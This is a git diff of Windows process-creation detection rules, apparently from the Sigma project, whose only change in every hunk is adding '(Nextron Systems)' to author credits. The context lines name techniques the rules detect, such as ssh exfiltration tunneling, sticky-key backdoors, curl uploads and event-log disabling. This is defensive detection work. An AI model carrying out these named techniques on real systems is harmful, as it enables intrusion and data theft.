index 98a0ec15d..d2ab3821e 100644
--- a/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml
+++ b/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
 references:
     - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/12
 modified: 2023/01/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml b/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml
index 8b52c2f45..db2c06811 100644
--- a/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml
+++ b/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
 references:
     - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
-author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
 date: 2018/03/15
 modified: 2021/09/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml
index 03f94f14c..939b518f7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml
@@ -5,7 +5,7 @@ description: Detects the use of 3proxy, a tiny free proxy server
 references:
     - https://github.com/3proxy/3proxy
     - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/13
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml b/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml
index be971492c..f73dc3a80 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration
 references:
     - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/27
 tags:
     - attack.collection
diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml
index 2dd54108c..ba86d4eae 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious command line that adds an account to the local administrators/administrateurs group
 references:
     - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2022/08/12
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml
index bb6938151..88e86451e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group
 references:
     - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/06
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml b/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml
index 24bbed6fd..f26cae65a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml
@@ -7,7 +7,7 @@ references:
     - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
     - https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/
     - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/20
 modified: 2022/05/13
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml b/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml
index 4507fd091..1ede7e0f2 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml
@@ -7,7 +7,7 @@ references:
     - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
     - https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/
     - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/20
 modified: 2022/05/05
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml
index fccb3b1b4..51d9229d2 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml
@@ -5,7 +5,7 @@ description: Detects suspicious children of application launched from inside the
 references:
     - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
     - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/12
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml b/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml
index b16f26f0e..71e064393 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml
@@ -8,7 +8,7 @@ description: Detects suspicious base64 encoded and obbfuscated LOAD string often
 references:
     - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
     - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/03/01
 modified: 2022/05/20
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml
index dfe52de30..e956c0929 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml
@@ -6,7 +6,7 @@ references:
     - https://twitter.com/haroonmeer/status/939099379834658817
     - https://twitter.com/c_APT_ure/status/939475433711722497
     - https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
-author: Florian Roth, Markus Neis
+author: Florian Roth (Nextron Systems), Markus Neis
 date: 2018/08/22
 modified: 2022/10/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_calc.yml b/rules/windows/process_creation/proc_creation_win_susp_calc.yml
index 2666e7c5d..0745eca5c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_calc.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_calc.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
 references:
     - https://twitter.com/ItsReallyNick/status/1094080242686312448
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/02/09
 modified: 2022/11/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml b/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml
index 726e3c7f1..7a898b8d0 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml
@@ -8,7 +8,7 @@ references:
     - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
     - https://twitter.com/egre55/status/1087685529016193025
     - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
-author: Florian Roth, juju4, keepwatch
+author: Florian Roth (Nextron Systems), juju4, keepwatch
 date: 2019/01/16
 modified: 2022/10/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml b/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml
index ec9580992..110139a53 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml
@@ -5,7 +5,7 @@ description: Detects suspicious a certutil command that used to encode files, wh
 references:
     - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
     - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
-author: Florian Roth, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
 date: 2019/02/24
 modified: 2022/01/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml b/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml
index 6c8e07fec..3d1a14128 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID
 references:
 - https://twitter.com/Kostastsale/status/1565257924204986369
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/01
 modified: 2022/12/15
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml b/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml
index f3c9e28a1..56a2af66b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious command line execution that includes an URL an
 references:
 - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100
 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
-author: Florian Roth, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
 date: 2019/01/16
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml
index fd1b0e589..9419d1f91 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/vxunderground/status/1423336151860002816?s=20
 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
 - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 modified: 2022/08/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml
index 1ebbb61ab..f29b48c6e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml
@@ -5,7 +5,7 @@ description: Detects a code page switch in command line or batch scripts to a ra
 references:
 - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers
 - https://twitter.com/cglyer/status/1183756892952248325
-author: Florian Roth, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
 date: 2019/10/14
 modified: 2022/01/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml
index 9acbd7d38..7520c28b6 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
 references:
 - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/11
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml b/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml
index 933335f9e..0c4de8255 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion
 references:
 - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/27
 logsource:
 product: windows
diff --git a/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml b/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml
index 4a289f522..b9579e098 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command line arguments of common data compression tools
 references:
 - https://twitter.com/SBousseaden/status/1184067445612535811
-author: Florian Roth, Samir Bousseaden
+author: Florian Roth (Nextron Systems), Samir Bousseaden
 date: 2019/10/15
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml b/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml
index 6068e526a..c69ce5808 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
 references:
 - https://twitter.com/rikvduijn/status/853251879320662017
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/04/15
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml b/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml
index 6c971e5f2..23771fa48 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml
@@ -7,7 +7,7 @@ references:
 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
 - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html
 - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
-author: 'Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali'
+author: 'Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali'
 date: 2019/12/30
 modified: 2022/12/23
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml b/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml
index 18e643ae0..dddcf3990 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml
@@ -10,7 +10,7 @@ description: |
 references:
 - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120
 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
-author: Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)
+author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
 date: 2020/07/03
 modified: 2022/09/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_covenant.yml b/rules/windows/process_creation/proc_creation_win_susp_covenant.yml
index 241943668..530549687 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_covenant.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_covenant.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious command lines used in Covenant luanchers
 references:
 - https://posts.specterops.io/covenant-v0-5-eee0507b85ba
-author: Florian Roth, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
 date: 2020/06/04
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml b/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml
index 21d396fd5..9f515e292 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml
@@ -7,7 +7,7 @@ references:
 - https://www.mandiant.com/resources/telegram-malware-iranian-espionage
 - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz
 - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/25
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_susp_csc.yml b/rules/windows/process_creation/proc_creation_win_susp_csc.yml
index fa7be8e44..2dd763878 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_csc.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_csc.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious parent of csc.exe, which could by a sign of payload delivery
 references:
 - https://twitter.com/SBousseaden/status/1094924091256176641
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/02/11
 modified: 2022/01/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml
index ab739ef00..434a6afda 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml
@@ -7,7 +7,7 @@ references:
 - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
 - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/
 - https://twitter.com/gN3mes1s/status/1206874118282448897
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/08/24
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_csexec.yml b/rules/windows/process_creation/proc_creation_win_susp_csexec.yml
index 380a2ee0a..bb4b1ddfe 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_csexec.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_csexec.yml
@@ -5,7 +5,7 @@ description: Detects the use of the lesser known remote execution tool named CsE
 references:
 - https://github.com/malcomvetter/CSExec
 - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/22
 tags:
 - attack.resource_development
diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml
index c7fef0b90..8540c76fc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml
@@ -10,7 +10,7 @@ references:
 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
 - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt
 - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2020/07/03
 modified: 2023/01/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml
index ab027167d..ecaea4286 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml
@@ -7,7 +7,7 @@ references:
 - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
 - https://curl.se/docs/manpage.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/03
 modified: 2022/09/15
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml b/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml
index a0cae886c..711bfe3b4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/gN3mes1s/status/1222088214581825540
 - https://twitter.com/gN3mes1s/status/1222095963789111296
 - https://twitter.com/gN3mes1s/status/1222095371175911424
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/01/28
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml b/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml
index db11754e0..e3bd3dc00 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious Microsoft desktopimgdownldr execution with par
 references:
 - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
 - https://twitter.com/SBousseaden/status/1278977301745741825
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/03
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml
index 2fe2a00d7..f1ba11344 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system
 references:
 - https://twitter.com/mrd0x/status/1460815932402679809
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml b/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml
index 77aefc62c..4c6a03c3f 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml
@@ -5,7 +5,7 @@ description: Detects command that is used to disable or delete Windows eventlog
 references:
 - https://twitter.com/0gtweet/status/1359039665232306183?s=21
 - https://ss64.com/nt/logman.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/11
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml b/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml
index 02a655f51..92b6b7390 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
 references:
 - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/06/19
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml b/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml
index 92b8e6308..74c40d55d 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
 references:
 - https://github.com/Neo23x0/Raccine
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/21
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml b/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml
index 01d2fc61f..3d6705937 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml
@@ -5,7 +5,7 @@ description: Detects a "dllhost" spawning with no commandline arguments which is
 references:
 - https://redcanary.com/blog/child-processes/
 - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/27
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml b/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml
index fe0920fae..a6f9a96ae 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml
@@ -5,7 +5,7 @@ description: Detects suspicious use of an .exe extension after a non-executable
 references:
 - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html
 - https://twitter.com/blackorbird/status/1140519090961825792
-author: Florian Roth (rule), @blu3_team (idea)
+author: Florian Roth (Nextron Systems), @blu3_team (idea)
 date: 2019/06/26
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml b/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml
index 36b76e0ce..e4b41831f 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml
@@ -5,7 +5,7 @@ description: Detects suspicious ways to download files from Microsoft domains th
 references:
 - https://twitter.com/an0n_r0/status/1474698356635193346?s=12
 - https://twitter.com/mrd0x/status/1475085452784844803?s=12
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2021/12/27
 modified: 2022/08/02
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml b/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml
index 2971a7037..8ec78a828 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml
@@ -5,7 +5,7 @@ description: Detects suspicious way to dump the kernel on Windows systems using
 references:
 - https://twitter.com/0gtweet/status/1474899714290208777?s=12
 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/28
 logsource:
 product: windows
diff --git a/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml b/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml
index 6884e7b44..248f5e6f0 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml
@@ -7,7 +7,7 @@ description: |
 references:
 - https://taggart-tech.com/quasar-electron/
 - https://github.com/mttaggart/quasar
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/21
 modified: 2022/11/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml b/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml
index a23737a8a..1e68e9960 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml
